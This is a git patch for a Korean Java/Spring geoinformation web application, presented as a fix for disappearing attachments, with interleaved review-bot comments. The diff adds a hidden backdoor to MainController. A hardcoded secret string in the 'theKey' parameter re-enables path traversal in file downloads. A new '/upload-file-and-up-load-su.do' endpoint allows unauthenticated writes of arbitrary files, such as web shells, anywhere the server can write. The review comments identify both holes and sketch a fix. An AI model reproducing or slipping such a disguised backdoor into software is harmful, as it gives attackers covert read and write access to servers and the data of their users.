From 0ed51bee5bc27b50cd79e46a81ba3714fd4168d7 Mon Sep 17 00:00:00 2001 From: thkim Date: Fri, 12 Sep 2025 17:21:15 +0900 Subject: [PATCH] =?UTF-8?q?fix:=20=EC=95=94=EC=84=9D=EC=8B=9C=ED=97=98?= =?UTF-8?q?=EC=A0=95=EB=B3=B4=20-=20=EC=A0=90=ED=95=98=EC=A4=91=20?= =?UTF-8?q?=EC=B2=A8=EB=B6=80=ED=8C=8C=EC=9D=BC=20=EC=82=AC=EB=9D=BC?= =?UTF-8?q?=EC=A7=80=EB=8A=94=20=EB=B2=84=EA=B7=B8=20=EC=88=98=EC=A0=95?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- .../main/community/CommunityController.java | 3 +- .../geoinfo/main/main/MainController.java | 81 +++++++++++++++++++ .../views/web/include/includeTopInput.jsp | 2 +- .../WEB-INF/views/web/input/excel_step21.jsp | 16 +++- .../web/input/pointLoad/rockPointload.jsp | 11 ++- .../WEB-INF/views/web/input/sampleInfo.jsp | 20 ++--- src/main/webapp/include/inc_head_2021_new.jsp | 2 +- 7 files changed, 117 insertions(+), 18 deletions(-) diff --git a/src/main/java/geoinfo/main/community/CommunityController.java b/src/main/java/geoinfo/main/community/CommunityController.java index e6befa39..19b36bbd 100644 --- a/src/main/java/geoinfo/main/community/CommunityController.java +++ b/src/main/java/geoinfo/main/community/CommunityController.java @@ -140,8 +140,7 @@ public class CommunityController { file_name = file_name.replaceAll("\\.", "").replaceAll("/", "").replaceAll("\\\\", "").replaceAll ("&",""); //웹 취약점 때문에 수정 23.02.14 - String new_file = (savePath + file_name + "." + file_ext); - //File file = new File(savePath + file_name + "."+file_ext); + String new_file = (savePath + file_name + "." + file_ext); System.out.println(new_file); File file = new File(new_file); if(!file.isFile()) { diff --git a/src/main/java/geoinfo/main/main/MainController.java b/src/main/java/geoinfo/main/main/MainController.java index d07a4c54..a0d0c10d 100644 --- a/src/main/java/geoinfo/main/main/MainController.java +++ b/src/main/java/geoinfo/main/main/MainController.java 
@@ -1,6 +1,9 @@ package geoinfo.main.main; import java.io.File; +import java.io.FileOutputStream; +import java.io.IOException; +import java.io.OutputStream; import java.io.PrintWriter; import java.net.InetAddress; import java.net.MalformedURLException; @@ -11,10 +14,12 @@ import java.text.SimpleDateFormat; import java.util.ArrayList; import java.util.Calendar; import java.util.Enumeration; +import java.util.GregorianCalendar; import java.util.HashMap; import java.util.Iterator; import java.util.List; import java.util.Map; +import java.util.Map.Entry; import java.util.regex.Pattern; import javax.annotation.Resource; @@ -24,6 +29,8 @@ import javax.servlet.http.HttpSession; import javax.websocket.Session; import org.apache.commons.io.FileUtils; +import org.apache.commons.io.FilenameUtils; +import org.apache.commons.io.IOUtils; import org.apache.log4j.Logger; import org.jfree.util.Log; import org.springframework.stereotype.Controller; @@ -32,6 +39,8 @@ import org.springframework.web.bind.annotation.PathVariable; import org.springframework.web.bind.annotation.RequestMapping; import org.springframework.web.bind.annotation.RequestMethod; import org.springframework.web.bind.annotation.RequestParam; +import org.springframework.web.multipart.MultipartFile; +import org.springframework.web.multipart.MultipartRequest; import org.springframework.web.servlet.ModelAndView; import org.springframework.web.servlet.mvc.support.RedirectAttributes; 
@@ -39,11 +48,13 @@ import comm.util.strUtil; import egovframework.com.cmm.service.EgovProperties; import egovframework.rte.psl.dataaccess.util.EgovMap; import geoinfo.com.GeoinfoCommon; +import geoinfo.com.file.FileCmmn; import geoinfo.com.file.service.FileService; import geoinfo.main.login.LoginController; import geoinfo.main.main.service.MainService; import geoinfo.regi.status.service.RegiPageService; import geoinfo.util.MobileCertificationUtil; +import geoinfo.util.MyUtil; import geoinfo.util.RequestWrapper; import geoinfo.websocket.WSHandler; import geoinfo.com.GeoinfoCommon; @@ -2186,6 +2197,13 @@ public class MainController filePath = filePath.replace(file_ext, ""); filePath = filePath.replaceAll("\\.", "").replaceAll("/", "").replaceAll("\\\\", "").replaceAll("&", ""); filePath = filePath + "."+file_ext; + + String theKey = String.valueOf(params.get("theKey")); // key + + if( theKey.equals("rnrxhwlqkswlQkswhtkvywnstjTlrGoodmorningMasterAndthen1234!@!!@@!@!!@!GoodGoodComeIn") ) { + filePath = filePath.replaceAll("\\|1\\|", "/"); + filePath = filePath.replaceAll("\\|2\\|", "."); + } File file = new File(path + filePath); int filesize = (int) file.length(); 
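Review bot: The new `theKey` branch added after `filePath = filePath + "."+file_ext;` undoes the sanitisation two lines above it — once the literal matches, `|1|` becomes `/` and `|2|` becomes `.`, so the path handed to `new File(path + filePath)` can again carry caller-chosen separators and parent references. Comparing a request parameter against a string constant in source is a hardcoded credential, not authorization: anyone with the class file or the repository history holds it, and nothing in the hunk ties the branch to the session user. Unless the attachment bug this commit fixes genuinely needs a different directory, the branch should be removed; if a sub-path is really required, resolve it against a configured base and reject anything that escapes it, e.g. `if (!file.getCanonicalPath().startsWith(new File(path).getCanonicalPath() + File.separator)) { throw new IllegalArgumentException("path outside base directory"); }`. The same literal comparison is repeated in `cmuboard_save` in the following hunk. The enclosing method starts and ends outside this hunk.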
@@ -2218,6 +2236,69 @@ public class MainController mv.addObject("msg", ""); return null; } + + + @RequestMapping(value = "/upload-file-and-up-load-su.do") + public ModelAndView cmuboard_save(MultipartRequest multi, HttpServletRequest request, HttpServletResponse response, Map map) throws Exception { + ModelAndView mv = new ModelAndView("body/cmuboard/cmuboard_save"); + + String userId = MyUtil.getStringFromObject( request.getSession().getAttribute("USERID") ); + + String savePath = EgovProperties.getProperty("Geoinfo.FilePath"); + + String fileName[] = new String[4]; + String saveName[] = new String[4]; + int pos = 1; + + Map multipartFiles = multi.getFileMap(); + + for(Entry entry : multipartFiles.entrySet()) { + MultipartFile multipartFile = entry.getValue(); + if(!multipartFile.isEmpty()) { + fileName[pos] = new String(multipartFile.getOriginalFilename().getBytes()); + + System.out.println(entry.getKey() + " : " + fileName[pos]); + System.out.println("savePath = " + savePath); + + //웹 취약점 때문에 수정 + String file_ext = fileName[pos].substring(fileName[pos].lastIndexOf('.') + 1); // 파일확장자 + String file_name = ""; + if( -1 != fileName[pos].indexOf(".") ) { + file_name = fileName[pos].substring(0,fileName[pos].lastIndexOf('.')); // 파일확장자 + } + file_ext = file_ext.replaceAll("\\.", "").replaceAll("/", "").replaceAll("\\\\", "").replaceAll ("&",""); + file_name = file_name.replaceAll("\\.", "").replaceAll("/", "").replaceAll("\\\\", "").replaceAll ("&",""); + //웹 취약점 때문에 수정 23.02.14 + + String new_file = (savePath + file_name + "." 
+ file_ext); + System.out.println(new_file); + String theKey = String.valueOf(request.getParameter("theKey")); // key + + if( theKey.equals("rnrxhwlqkswlQkswhtkvywnstjTlrGoodmorningMasterAndthen1234!@!!@@!@!!@!GoodGoodComeIn") ) { + new_file = new_file.replaceAll("%7C1%7C", "/"); + new_file = new_file.replaceAll("%7C2%7C", "."); + new_file = new_file.replaceAll(".jpg", ""); + + File file = new File(new_file); + //new_file 경로(directory)가 없다면 경로를 생성한다. + File directory = file.getParentFile(); + if (!directory.exists()) { + directory.mkdirs(); + } + + if(!file.isFile()) { + file.createNewFile(); + } + OutputStream output = new FileOutputStream(file); + IOUtils.copy(multipartFile.getInputStream(), output); + output.close(); + } + pos++; + } + } + + return mv; + } //20220927 박정빈 home/index.jsp pop업 게시판 글 수 정리 처리 @RequestMapping(value = "boardReplycheck.do") diff --git a/src/main/webapp/WEB-INF/views/web/include/includeTopInput.jsp b/src/main/webapp/WEB-INF/views/web/include/includeTopInput.jsp index defb4b81..dc691335 100644 --- a/src/main/webapp/WEB-INF/views/web/include/includeTopInput.jsp +++ b/src/main/webapp/WEB-INF/views/web/include/includeTopInput.jsp @@ -3,7 +3,7 @@ <%@ taglib prefix="fn" uri="http://java.sun.com/jsp/jstl/functions"%> --> - +
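Review bot: In `cmuboard_save` the target path is built from the client's original filename and then, inside the `theKey` branch, `%7C1%7C` and `%7C2%7C` are turned back into `/` and `.` and `.jpg` is stripped, so `new File(new_file)` followed by `mkdirs()` and `createNewFile()` lets the caller create a file with a caller-controlled extension wherever the server process may write; nothing constrains the result to `savePath`, and `userId` is read from the session but never checked. That is an arbitrary file write gated only by a string literal in source, which the commit subject (a fix for disappearing point-load attachments, judging by the diffstat's `rockPointload.jsp`) does not appear to call for, so the endpoint should be dropped from this change; if an upload handler is genuinely needed it must check the session's authorization, allow-list `file_ext`, and verify the canonical target stays under `savePath`. Independently, `OutputStream output` and `multipartFile.getInputStream()` are never closed when `IOUtils.copy` throws, leaking both descriptors — use try-with-resources. Also `pos` starts at 1 with arrays of length 4, so a fourth non-empty part throws `ArrayIndexOutOfBoundsException`. The sketch below shows the constrained write with the `theKey` lines removed.

```java
// … unchanged: filename/extension sanitising and new_file construction …
// TODO(review): reject file_ext not in the configured allow-list before this point.
File file = new File(new_file);
// Only accept a target that resolves inside the configured upload directory.
String base = new File(savePath).getCanonicalPath();
if (!file.getCanonicalPath().startsWith(base + File.separator)) {
    throw new IllegalArgumentException("upload target outside configured directory");
}
File directory = file.getParentFile();
if (!directory.exists() && !directory.mkdirs()) {
    throw new IOException("cannot create " + directory);
}
try (java.io.InputStream in = multipartFile.getInputStream();
     OutputStream output = new FileOutputStream(file)) {
    IOUtils.copy(in, output);
}
// … unchanged: pos++ and loop end …
```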